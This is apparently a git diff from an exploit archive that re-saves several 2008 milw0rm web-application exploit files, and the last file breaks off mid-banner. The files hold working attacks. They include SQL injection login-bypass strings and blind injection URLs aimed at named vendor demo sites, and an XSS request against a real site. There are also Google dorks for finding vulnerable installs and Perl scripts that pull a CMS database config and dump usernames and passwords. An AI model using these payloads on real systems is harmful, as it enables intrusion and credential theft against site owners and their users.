b/platforms/php/webapps/7263.txt 
@@ -1,22 +1,21 @@ - -Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability - --------------------------------------------------------------- - -Author: MrDoug -E-mail: mrdoug13[at]gmail[dot]com - --------------------------------------------------------------- - -Exploit: http://demo.hotelsadmin.com/admin/index.php - -Username == admin' or '1'='1 -password == (whatever) - --------------------------------------------------------------- - -Greetz to Slappywag - --------------------------------------------------------------- - -# milw0rm.com [2008-11-28] +Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability + +-------------------------------------------------------------- + +Author: MrDoug +E-mail: mrdoug13[at]gmail[dot]com + +-------------------------------------------------------------- + +Exploit: http://demo.hotelsadmin.com/admin/index.php + +Username == admin' or '1'='1 +password == (whatever) + +-------------------------------------------------------------- + +Greetz to Slappywag + +-------------------------------------------------------------- + +# milw0rm.com [2008-11-28] diff --git a/platforms/php/webapps/7265.txt b/platforms/php/webapps/7265.txt index 57de0426f..b13bea777 100755 --- a/platforms/php/webapps/7265.txt +++ b/platforms/php/webapps/7265.txt 
@@ -1,81 +1,81 @@ -000000 00000 0000 0000 000 00 000000 0000000 0000 000000 00000 - 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 - 0 0 0 0 00 0 0 0 0 0 0 0 0 00 0 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 - 00000 0 0 0 0 0 0 0 0 00000 0000 0 0 0 0 00000 0 0 - 0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0 - 0 0 0 0 000 0 0 0 0 0 0 0 000 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 -000000 0000000 000 0000 000 00 000000 0000000 000 000 00 00000 - - - -[+] Script : Web Calendar System v 3.22/3.40/3.05/3.23 - -[+] Exploit Type : Multiple Exploits (XSS + remote bypass Exploit+Remote SQL Injection ) - -[+] Google Dork : intitle:Web Calendar system v 3.40 inurl:.asp -[+] Google Dork : intitle:Web Calendar system v 3.22 inurl:.asp -[+] Google Dork : intitle:Web Calendar system v 3.23 inurl:.asp -[+] Google Dork : intitle:Web Calendar system v 3.05 inurl:.asp - -[+] Contact : blackbeard-sql @ hotmail.fr \\ Damn u crawlers :s - - ---//--> Exploit : - -1) Remote Bypass Exploit : - -http://[website]/[script]/calendar.asp?DoAction=USER&Change=LOGINFORM - -username:' or '1'='1 - -password:' or '1'='1 - -2) Remote XSS exploit : - -http://[website]/[script]/calendar.asp?Client=1&Lang=3&Search=1&DoAction=Calendar&View=Search - -POST /Calendar/calendar.asp?Client=1&Lang=3&Search=1&DoAction=Calendar&View=Search HTTP/1.1 -Host: www.southforkwatershed.org -User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.4) Gecko/2008102920 Firefox 3.0.3 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 -Accept-Encoding: gzip,deflate -Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 -Keep-Alive: 300 -Connection: keep-alive -Referer: http://[website]/[script]/calendar.asp?Client=1&Lang=3&Search=1&DoAction=Calendar&View=Search -Cookie: ASPSESSIONIDSABBQBTD=MMPLNBODFDNEKLCLBECLLJOC -Content-Type: application/x-www-form-urlencoded -Content-Length: 55 -SText=%3Cscript%3Ealert%28%27XSSed%27%29%3C%2Fscript%3E - - 
-HTTP/1.x 200 OK -Cache-Control: no-cache -Date: Fri, 28 Nov 2008 11:45:08 GMT -Pragma: no-cache -Content-Type: text/html -Expires: Fri, 28 Nov 2008 11:44:08 GMT -Server: Microsoft-IIS/6.0 -MicrosoftOfficeWebServer: 5.0_Pub -X-Powered-By: ASP.NET -Content-Encoding: gzip -Vary: Accept-Encoding -Transfer-Encoding: chunked - - -In simple words : - -POST : - -SText=<script>alert('Blackbeard is here')</script> - -3) Remote SQL injection: - -http://[website]/[script]/calendar.asp?DoAction=Calendar&Q_DATE=11/28/2008&View=Event&IDEvent=2824+union+select+1+from+msysobjects - -[peace xD] - -# milw0rm.com [2008-11-28] +000000 00000 0000 0000 000 00 000000 0000000 0000 000000 00000 + 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 + 0 0 0 0 00 0 0 0 0 0 0 0 0 00 0 0 0 0 0 + 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 + 00000 0 0 0 0 0 0 0 0 00000 0000 0 0 0 0 00000 0 0 + 0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0 + 0 0 0 0 000 0 0 0 0 0 0 0 000 0 0 0 0 + 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 +000000 0000000 000 0000 000 00 000000 0000000 000 000 00 00000 + + + +[+] Script : Web Calendar System v 3.22/3.40/3.05/3.23 + +[+] Exploit Type : Multiple Exploits (XSS + remote bypass Exploit+Remote SQL Injection ) + +[+] Google Dork : intitle:Web Calendar system v 3.40 inurl:.asp +[+] Google Dork : intitle:Web Calendar system v 3.22 inurl:.asp +[+] Google Dork : intitle:Web Calendar system v 3.23 inurl:.asp +[+] Google Dork : intitle:Web Calendar system v 3.05 inurl:.asp + +[+] Contact : blackbeard-sql @ hotmail.fr \\ Damn u crawlers :s + + +--//--> Exploit : + +1) Remote Bypass Exploit : + +http://[website]/[script]/calendar.asp?DoAction=USER&Change=LOGINFORM + +username:' or '1'='1 + +password:' or '1'='1 + +2) Remote XSS exploit : + +http://[website]/[script]/calendar.asp?Client=1&Lang=3&Search=1&DoAction=Calendar&View=Search + +POST /Calendar/calendar.asp?Client=1&Lang=3&Search=1&DoAction=Calendar&View=Search HTTP/1.1 +Host: www.southforkwatershed.org +User-Agent: Mozilla/5.0 (Windows; U; 
Windows NT 5.1; fr; rv:1.9.0.4) Gecko/2008102920 Firefox 3.0.3 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 +Accept-Encoding: gzip,deflate +Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 +Keep-Alive: 300 +Connection: keep-alive +Referer: http://[website]/[script]/calendar.asp?Client=1&Lang=3&Search=1&DoAction=Calendar&View=Search +Cookie: ASPSESSIONIDSABBQBTD=MMPLNBODFDNEKLCLBECLLJOC +Content-Type: application/x-www-form-urlencoded +Content-Length: 55 +SText=%3Cscript%3Ealert%28%27XSSed%27%29%3C%2Fscript%3E + + +HTTP/1.x 200 OK +Cache-Control: no-cache +Date: Fri, 28 Nov 2008 11:45:08 GMT +Pragma: no-cache +Content-Type: text/html +Expires: Fri, 28 Nov 2008 11:44:08 GMT +Server: Microsoft-IIS/6.0 +MicrosoftOfficeWebServer: 5.0_Pub +X-Powered-By: ASP.NET +Content-Encoding: gzip +Vary: Accept-Encoding +Transfer-Encoding: chunked + + +In simple words : + +POST : + +SText=<script>alert('Blackbeard is here')</script> + +3) Remote SQL injection: + +http://[website]/[script]/calendar.asp?DoAction=Calendar&Q_DATE=11/28/2008&View=Event&IDEvent=2824+union+select+1+from+msysobjects + +[peace xD] + +# milw0rm.com [2008-11-28] diff --git a/platforms/php/webapps/7266.pl b/platforms/php/webapps/7266.pl index 984c37f87..9e17b66c6 100755 --- a/platforms/php/webapps/7266.pl +++ b/platforms/php/webapps/7266.pl 
@@ -1,130 +1,130 @@ -#!/usr/bin/perl - -=about - - All Club CMS <= 0.0.2 Remote DB Config Retrieve Exploit - ------------------------------------------------------- - by athos - staker[at]hotmail[dot]it - download on http://sourceforge.net - ------------------------------------------------------- - Usage: perl exploit.pl localhost/cms [MODE] - perl exploit.pl localhost/cms all - perl exploit.pl localhost/cms default - ------------------------------------------------------- - NOTE: Don't add me on MSN Messenger - - -=cut - -use strict; -use warnings; -use IO::Socket; -use LWP::UserAgent; - -my (@conf,$result); - -my $host = shift; -my $path = shift; -my $mode = shift or &usage; -my @data = split /=\s/,dbconfig(); - -die "Exploit Failed!\n" unless(join('',@data) =~ /DB_PASS/i); - -if($mode =~ /all/i) -{ - my $http = new LWP::UserAgent( - agent => 'Lynx (textmode)', - timeout => 5, - ) or die $!; - - my $send = $http->get("http://${host}/${path}/accms.dat"); - - if($send->is_success) - { - print STDOUT $send->content; - exit; - } - else - { - print STDERR $send->status_line; - exit; - } -} - - -if($mode =~ /default/i) -{ - $data[9] =~ s/\s/\0/; # password - $data[8] =~ s/DB_PASS/\0/; # username - $data[7] =~ s/DB_USER/\0/; # db host - $data[6] =~ s/DB_HOST/\0/; # db name - $data[5] =~ s/DEF_DB/\0/; # db type - - @conf = ( - 'dbhost:' => $data[7], - 'dbname:' => $data[6], - 'dbtype:' => $data[5], - 'username:' => $data[8], - 'password:' => $data[9], - ); - - foreach(@conf) - { - $result .= $_; - } - - my $content = join '',split / /,$result; - - if($content =~ /(dbhost|dbname|dbtype|username|password)/i) - { - print STDOUT "[-] Exploit Successfully!\n"; - print STDOUT $content; - exit; - } - else - { - print STDOUT "[-] Exploit Failed!\n"; - print STDOUT "[-] by athos - staker[at]hotmail[dot]it\n"; - exit; - } -} - - -sub dbconfig -{ - my $html; - my $sock = new IO::Socket::INET( - PeerAddr => $host, - PeerPort => 80, - Proto => 'tcp', - ) or die $!; - - - my $data = 
"GET /$path/accms.dat HTTP/1.1\r\n". - "Host: $host\r\n". - "User-Agent: Lynx (textmode)\r\n". - "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n". - "Accept-Language: en-us,en;q=0.5\r\n". - "Accept-Encoding: text/plain\r\n". - "Connection: close\r\n\r\n"; - - $sock->send($data); - - while(<$sock>) - { - $html .= $_; - } return $html if $html =~ m{HTTP/1.1 200 OK}; -} - - - -sub usage -{ - print STDOUT "[-] All Club CMS <= 0.0.2 Remote DB Config Retrieve Exploit\n"; - print STDOUT "[-] Usage: perl $0 [host] [path] [mode]\n"; - print STDOUT " perl $0 localhost /cms all\n"; - print STDOUT " perl $0 localhost /cms default\n"; - exit; -} - -# milw0rm.com [2008-11-28] +#!/usr/bin/perl + +=about + + All Club CMS <= 0.0.2 Remote DB Config Retrieve Exploit + ------------------------------------------------------- + by athos - staker[at]hotmail[dot]it + download on http://sourceforge.net + ------------------------------------------------------- + Usage: perl exploit.pl localhost/cms [MODE] + perl exploit.pl localhost/cms all + perl exploit.pl localhost/cms default + ------------------------------------------------------- + NOTE: Don't add me on MSN Messenger + + +=cut + +use strict; +use warnings; +use IO::Socket; +use LWP::UserAgent; + +my (@conf,$result); + +my $host = shift; +my $path = shift; +my $mode = shift or &usage; +my @data = split /=\s/,dbconfig(); + +die "Exploit Failed!\n" unless(join('',@data) =~ /DB_PASS/i); + +if($mode =~ /all/i) +{ + my $http = new LWP::UserAgent( + agent => 'Lynx (textmode)', + timeout => 5, + ) or die $!; + + my $send = $http->get("http://${host}/${path}/accms.dat"); + + if($send->is_success) + { + print STDOUT $send->content; + exit; + } + else + { + print STDERR $send->status_line; + exit; + } +} + + +if($mode =~ /default/i) +{ + $data[9] =~ s/\s/\0/; # password + $data[8] =~ s/DB_PASS/\0/; # username + $data[7] =~ s/DB_USER/\0/; # db host + $data[6] =~ s/DB_HOST/\0/; # db name + $data[5] =~ s/DEF_DB/\0/; # 
db type + + @conf = ( + 'dbhost:' => $data[7], + 'dbname:' => $data[6], + 'dbtype:' => $data[5], + 'username:' => $data[8], + 'password:' => $data[9], + ); + + foreach(@conf) + { + $result .= $_; + } + + my $content = join '',split / /,$result; + + if($content =~ /(dbhost|dbname|dbtype|username|password)/i) + { + print STDOUT "[-] Exploit Successfully!\n"; + print STDOUT $content; + exit; + } + else + { + print STDOUT "[-] Exploit Failed!\n"; + print STDOUT "[-] by athos - staker[at]hotmail[dot]it\n"; + exit; + } +} + + +sub dbconfig +{ + my $html; + my $sock = new IO::Socket::INET( + PeerAddr => $host, + PeerPort => 80, + Proto => 'tcp', + ) or die $!; + + + my $data = "GET /$path/accms.dat HTTP/1.1\r\n". + "Host: $host\r\n". + "User-Agent: Lynx (textmode)\r\n". + "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n". + "Accept-Language: en-us,en;q=0.5\r\n". + "Accept-Encoding: text/plain\r\n". + "Connection: close\r\n\r\n"; + + $sock->send($data); + + while(<$sock>) + { + $html .= $_; + } return $html if $html =~ m{HTTP/1.1 200 OK}; +} + + + +sub usage +{ + print STDOUT "[-] All Club CMS <= 0.0.2 Remote DB Config Retrieve Exploit\n"; + print STDOUT "[-] Usage: perl $0 [host] [path] [mode]\n"; + print STDOUT " perl $0 localhost /cms all\n"; + print STDOUT " perl $0 localhost /cms default\n"; + exit; +} + +# milw0rm.com [2008-11-28] diff --git a/platforms/php/webapps/7267.txt b/platforms/php/webapps/7267.txt index ba04aa356..d7efe5186 100755 --- a/platforms/php/webapps/7267.txt +++ b/platforms/php/webapps/7267.txt 
@@ -1,34 +1,34 @@ -------------------------------------------------------------------------- - -- JIKO FroM No-exploit.Com --- -------------------------------------------------------------------------- -# Author : jiko -# email : jalikom@hotmail.com -# Home : www.no-exploit.Com -# Script : http://relative.nl/projects.php?subMnuItem=1 - -=========================JIkI Team=================== -# Exploit : - http://no-exploit.com - real name of admin or ember - Username : demo1 ' or ' 1=1 - Password : demo1 ' or ' 1=1 or JIKO or any thing -ex: - Username : demo1 ' or ' 1=1 - Password : demo1 ' or ' 1=1 or JIKO or any thing - -=========================JIKI Team=================== - greetz : all my friend and all No-exploit members and - $ Gold_M $ Cochlain $ Hassin X $ cyber-zone $ r00t c0d3r $ HiSoKa $ MizoZ $ The-PunisheR - all muslims - visit: ==> www.no-exploit.Com - Visit: My-montada.Co.cc For your free Forum -------------------------------------------------------------------------- - -- JIKI Team [ JIKO + KIl1er ] -- -------------------------------------------------------------------------- -------== troops of Mohamed comming inchalah =----------------- -Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++ [!] Fi Khater Mgharba wahed wahed , Kima tayGol Khoya cyber-zone , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!] 
++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ - -# milw0rm.com [2008-11-28] +------------------------------------------------------------------------- + -- JIKO FroM No-exploit.Com --- +------------------------------------------------------------------------- +# Author : jiko +# email : jalikom@hotmail.com +# Home : www.no-exploit.Com +# Script : http://relative.nl/projects.php?subMnuItem=1 + +=========================JIkI Team=================== +# Exploit : + http://no-exploit.com + real name of admin or ember + Username : demo1 ' or ' 1=1 + Password : demo1 ' or ' 1=1 or JIKO or any thing +ex: + Username : demo1 ' or ' 1=1 + Password : demo1 ' or ' 1=1 or JIKO or any thing + +=========================JIKI Team=================== + greetz : all my friend and all No-exploit members and + $ Gold_M $ Cochlain $ Hassin X $ cyber-zone $ r00t c0d3r $ HiSoKa $ MizoZ $ The-PunisheR + all muslims + visit: ==> www.no-exploit.Com + Visit: My-montada.Co.cc For your free Forum +------------------------------------------------------------------------- + -- JIKI Team [ JIKO + KIl1er ] -- +------------------------------------------------------------------------- +------== troops of Mohamed comming inchalah =----------------- +Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++ [!] Fi Khater Mgharba wahed wahed , Kima tayGol Khoya cyber-zone , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!] ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ + +# milw0rm.com [2008-11-28] diff --git a/platforms/php/webapps/7268.txt b/platforms/php/webapps/7268.txt index 58e4c0f65..e2f845ded 100755 
--- a/platforms/php/webapps/7268.txt +++ b/platforms/php/webapps/7268.txt 
@@ -1,43 +1,43 @@ -++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ - + - Bluo cms 1.2 blind sql injection Vulnerability + - + -Discovered by : The_5p3ctrum + -Contact AUTHOR: sp3[at]linuxmail.org & 5p[at]linuxmail.org + + - + - Mor0ccan Nightmares + - + - + -++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ - -##################################################### - -APPLICATION : bluocms -DOWNLOAD(299 $): http://www.bluocms.com/shop.php -VENDOR : http://www.bluocms.com -DEMO : http://www.bluocms.com/demo - -##################################################### - - -[+] vuln : blind sql injection - - -[+] Exploit : - true: - - http://www.bluocms.com/demo/index.php?id=511 and substring(@@version,1,1)=5 - http://www.bluocms.com/demo/index.php?id=511 and 1=1 - - false: - - http://www.bluocms.com/demo/index.php?id=511 and substring(@@version,1,1)=4 - http://www.bluocms.com/demo/index.php?id=511 and 1=2 - -########################################################################################################## - # -# Greetings: str0ke, BayHay, Cyber-Zone, Drackanz, The_leo, The_Casper, Fucker_Net, And All my friends # - # -########################################################################################################## - -# milw0rm.com [2008-11-28] +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + Bluo cms 1.2 blind sql injection Vulnerability + + + +Discovered by : The_5p3ctrum + +Contact AUTHOR: sp3[at]linuxmail.org & 5p[at]linuxmail.org + + + + + Mor0ccan Nightmares + + + + + +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + +##################################################### + +APPLICATION : bluocms +DOWNLOAD(299 $): http://www.bluocms.com/shop.php +VENDOR : http://www.bluocms.com +DEMO : http://www.bluocms.com/demo + +##################################################### + + +[+] vuln : blind sql injection + + +[+] Exploit : + true: + + 
http://www.bluocms.com/demo/index.php?id=511 and substring(@@version,1,1)=5 + http://www.bluocms.com/demo/index.php?id=511 and 1=1 + + false: + + http://www.bluocms.com/demo/index.php?id=511 and substring(@@version,1,1)=4 + http://www.bluocms.com/demo/index.php?id=511 and 1=2 + +########################################################################################################## + # +# Greetings: str0ke, BayHay, Cyber-Zone, Drackanz, The_leo, The_Casper, Fucker_Net, And All my friends # + # +########################################################################################################## + +# milw0rm.com [2008-11-28] diff --git a/platforms/php/webapps/7269.pl b/platforms/php/webapps/7269.pl index 65fb6c84a..857c93ec8 100755 --- a/platforms/php/webapps/7269.pl +++ b/platforms/php/webapps/7269.pl 
@@ -1,92 +1,92 @@ -#!/usr/bin/perl -w -#========================================================== -# CMS little (index.php term) Remote SQL Injection Exploit -#========================================================== -# -# ,--^----------,--------,-----,-------^--, -# | ||||||||| `--------' | O .. CWH Underground Hacking Team .. -# `+---------------------------^----------| -# `\_,-------, _________________________| -# / XXXXXX /`| / -# / XXXXXX / `\ / -# / XXXXXX /\______( -# / XXXXXX / -# / XXXXXX / -# (________( -# `------' -# -#AUTHOR : CWH Underground -#DATE : 28 November 2008 -#SITE : cwh.citec.us -# -# -##################################################### -#APPLICATION : CMS little -#VERSION : 0.0.1 -#DOWNLOAD : http://downloads.sourceforge.net/littlecms/CMSLite.zip -###################################################### -# -#Note: magic_quotes_gpc = off -# -####################################################################################### -#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK -#Special Thx : asylu3, str0ke, citec.us, milw0rm.com -####################################################################################### - - -use LWP::UserAgent; -use HTTP::Request; - -if ($#ARGV+1 != 2) -{ - print "\n==============================================\n"; - print " CMS little Remote SQL Injection Exploit \n"; - print " \n"; - print " Discovered By CWH Underground \n"; - print "==============================================\n"; - print " \n"; - print " ,--^----------,--------,-----,-------^--, \n"; - print " | ||||||||| `--------' | O \n"; - print " `+---------------------------^----------| \n"; - print " `\_,-------, _________________________| \n"; - print " / XXXXXX /`| / \n"; - print " / XXXXXX / `\ / \n"; - print " / XXXXXX /\______( \n"; - print " / XXXXXX / \n"; - print " / XXXXXX / .. CWH Underground Hacking Team .. 
\n"; - print " (________( \n"; - print " `------' \n"; - print " \n"; - print "Usage : ./xpl.pl <Target> <Data Limit>\n"; - print "Example: ./xpl.pl http://www.target.com/cmslite 10\n"; - exit(); -} - -$target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0]; -$number = $ARGV[1]; - -print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++"; -print "\n ..:: SQL Injection Exploit By CWH Underground ::.. "; -print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n"; -print "\n[+]Dump Username and Password\n"; - -for ($start=0;$start<$number;$start++) { - -$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n"; -$req = HTTP::Request->new(GET => $target."/index.php?term=a%%27%20and%201=2%20union%20select%201,concat(0x3a3a3a,name,0x3a3a,password,0x3a3a3a),3,4,5,6,7,8,9,10,11,12%20from%20personal_users%20limit%201%20offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!\n"; -$res = $xpl->request($req); -$info = $res->content; -$count=$start+1; - -if ($info =~ /:::(.+):::/) -{ -$dump=$1; -($username,$password)= split('::',$dump); -printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n"; -} -else { - print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n"; - exit; -} - -# milw0rm.com [2008-11-28] +#!/usr/bin/perl -w +#========================================================== +# CMS little (index.php term) Remote SQL Injection Exploit +#========================================================== +# +# ,--^----------,--------,-----,-------^--, +# | ||||||||| `--------' | O .. CWH Underground Hacking Team .. 
+# `+---------------------------^----------| +# `\_,-------, _________________________| +# / XXXXXX /`| / +# / XXXXXX / `\ / +# / XXXXXX /\______( +# / XXXXXX / +# / XXXXXX / +# (________( +# `------' +# +#AUTHOR : CWH Underground +#DATE : 28 November 2008 +#SITE : cwh.citec.us +# +# +##################################################### +#APPLICATION : CMS little +#VERSION : 0.0.1 +#DOWNLOAD : http://downloads.sourceforge.net/littlecms/CMSLite.zip +###################################################### +# +#Note: magic_quotes_gpc = off +# +####################################################################################### +#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK +#Special Thx : asylu3, str0ke, citec.us, milw0rm.com +####################################################################################### + + +use LWP::UserAgent; +use HTTP::Request; + +if ($#ARGV+1 != 2) +{ + print "\n==============================================\n"; + print " CMS little Remote SQL Injection Exploit \n"; + print " \n"; + print " Discovered By CWH Underground \n"; + print "==============================================\n"; + print " \n"; + print " ,--^----------,--------,-----,-------^--, \n"; + print " | ||||||||| `--------' | O \n"; + print " `+---------------------------^----------| \n"; + print " `\_,-------, _________________________| \n"; + print " / XXXXXX /`| / \n"; + print " / XXXXXX / `\ / \n"; + print " / XXXXXX /\______( \n"; + print " / XXXXXX / \n"; + print " / XXXXXX / .. CWH Underground Hacking Team .. \n"; + print " (________( \n"; + print " `------' \n"; + print " \n"; + print "Usage : ./xpl.pl <Target> <Data Limit>\n"; + print "Example: ./xpl.pl http://www.target.com/cmslite 10\n"; + exit(); +} + +$target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0]; +$number = $ARGV[1]; + +print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++"; +print "\n ..:: SQL Injection Exploit By CWH Underground ::.. 
"; +print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n"; +print "\n[+]Dump Username and Password\n"; + +for ($start=0;$start<$number;$start++) { + +$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n"; +$req = HTTP::Request->new(GET => $target."/index.php?term=a%%27%20and%201=2%20union%20select%201,concat(0x3a3a3a,name,0x3a3a,password,0x3a3a3a),3,4,5,6,7,8,9,10,11,12%20from%20personal_users%20limit%201%20offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!\n"; +$res = $xpl->request($req); +$info = $res->content; +$count=$start+1; + +if ($info =~ /:::(.+):::/) +{ +$dump=$1; +($username,$password)= split('::',$dump); +printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n"; +} +else { + print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n"; + exit; +} + +# milw0rm.com [2008-11-28] diff --git a/platforms/php/webapps/7270.txt b/platforms/php/webapps/7270.txt index ad7c9a76e..b3d75f06d 100755 --- a/platforms/php/webapps/7270.txt +++ b/platforms/php/webapps/7270.txt 
@@ -1,42 +1,42 @@ -[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ - [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability - - [~]Vendor:www.revou.com - - [~]Software: ReVou Online - - [~]author: ((я3d D3v!L)) - - [~] Date: 28.11.2008 - - [~] Home: www.ahacker.biz - - [~] contact: N/A - -[~] -----------------------------{str0ke}------------------------------ - - - [~] Exploit: - - username: r0' or ' 1=1-- - password: r0' or ' 1=1-- - - - [~]login 4 d3m0: - - http://www.revou.com/demo/ - - [~]-----------------------------{str0ke}--------------------------------------------------- - - [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker - [~] - [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري - [~] - [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller - [~] - [~] xp10.biz & ahacker.biz - [~] - - [~]-------------------------------------------------------------------------------- - -# milw0rm.com [2008-11-28] +[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ + [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability + + [~]Vendor:www.revou.com + + [~]Software: ReVou Online + + [~]author: ((я3d D3v!L)) + + [~] Date: 28.11.2008 + + [~] Home: www.ahacker.biz + + [~] contact: N/A + +[~] -----------------------------{str0ke}------------------------------ + + + [~] Exploit: + + username: r0' or ' 1=1-- + password: r0' or ' 1=1-- + + + [~]login 4 d3m0: + + http://www.revou.com/demo/ + + [~]-----------------------------{str0ke}--------------------------------------------------- + + [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker + [~] + [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري + [~] + [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller + [~] + [~] xp10.biz & ahacker.biz + [~] + + [~]-------------------------------------------------------------------------------- + +# milw0rm.com [2008-11-28] 
diff --git a/platforms/php/webapps/7271.txt b/platforms/php/webapps/7271.txt index 790fba1b1..3dde3ede6 100755 --- a/platforms/php/webapps/7271.txt +++ b/platforms/php/webapps/7271.txt @@ -1,18 +1,18 @@ -######################################################### ---------------------------------------------------------- -Portal Name: Ocean12 FAQ Manager Pro -Author : Mountassif Moad - Evil Finger / v4 Team -Vulnerability : Blind Sql Injection ---------------------------------------------------------- -######################################################### -Exploit : -site.com/?Action=Cat&ID=40%20and%201=1 true -site.com/?Action=Cat&ID=40%20and%201=0 false -Demo : -http://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=1 true -http://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=0 false - -# you can exploting the bug white blind sql automatic toolz such as sqlmap or ... - -# milw0rm.com [2008-11-28] +######################################################### +--------------------------------------------------------- +Portal Name: Ocean12 FAQ Manager Pro +Author : Mountassif Moad + Evil Finger / v4 Team +Vulnerability : Blind Sql Injection +--------------------------------------------------------- +######################################################### +Exploit : +site.com/?Action=Cat&ID=40%20and%201=1 true +site.com/?Action=Cat&ID=40%20and%201=0 false +Demo : +http://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=1 true +http://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=0 false + +# you can exploting the bug white blind sql automatic toolz such as sqlmap or ... + +# milw0rm.com [2008-11-28] diff --git a/platforms/php/webapps/7284.txt b/platforms/php/webapps/7284.txt index 3351a3179..596883fc8 100755 --- a/platforms/php/webapps/7284.txt +++ b/platforms/php/webapps/7284.txt 
@@ -1,64 +1,64 @@ -*********************************************************************************************************************************************************** -[!] [!] -[!] OOOO O OOOOOOOOO [!] -[!] O O O O O [!] -[!] O O O [!] -[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] -[!] O OOO OOO O O O O OO O O O O OO O O O [!] -[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] -[!] O O OOOO O O O O O O O O O O O [!] -[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] -[!] OO [!] -[!] OO [!] -[!] OO Proud To Be MoroCCaN [!] -[!] OO WwW.Exploiter5.CoM , WwW.No-ExploiT.CoM , WwW.IQ-TY.CoM [!] -*********************************************************************************************************************************************************** -+---- Bismi Allah Irahmani ArraHim ----+ -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++ [ PHP TV Portal<= 2.0 (mid) Remote SQL Injection ] ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -: Author : Cyber-Zone ( Abdelkhalek) : : : -¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ -¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦ -¦ TeaM : Mor0ccan Nightmares ¦ ¦ ¦ -¦ Script : http://www.businessvein.com/ ¦ ¦ ![ 4 ]! 
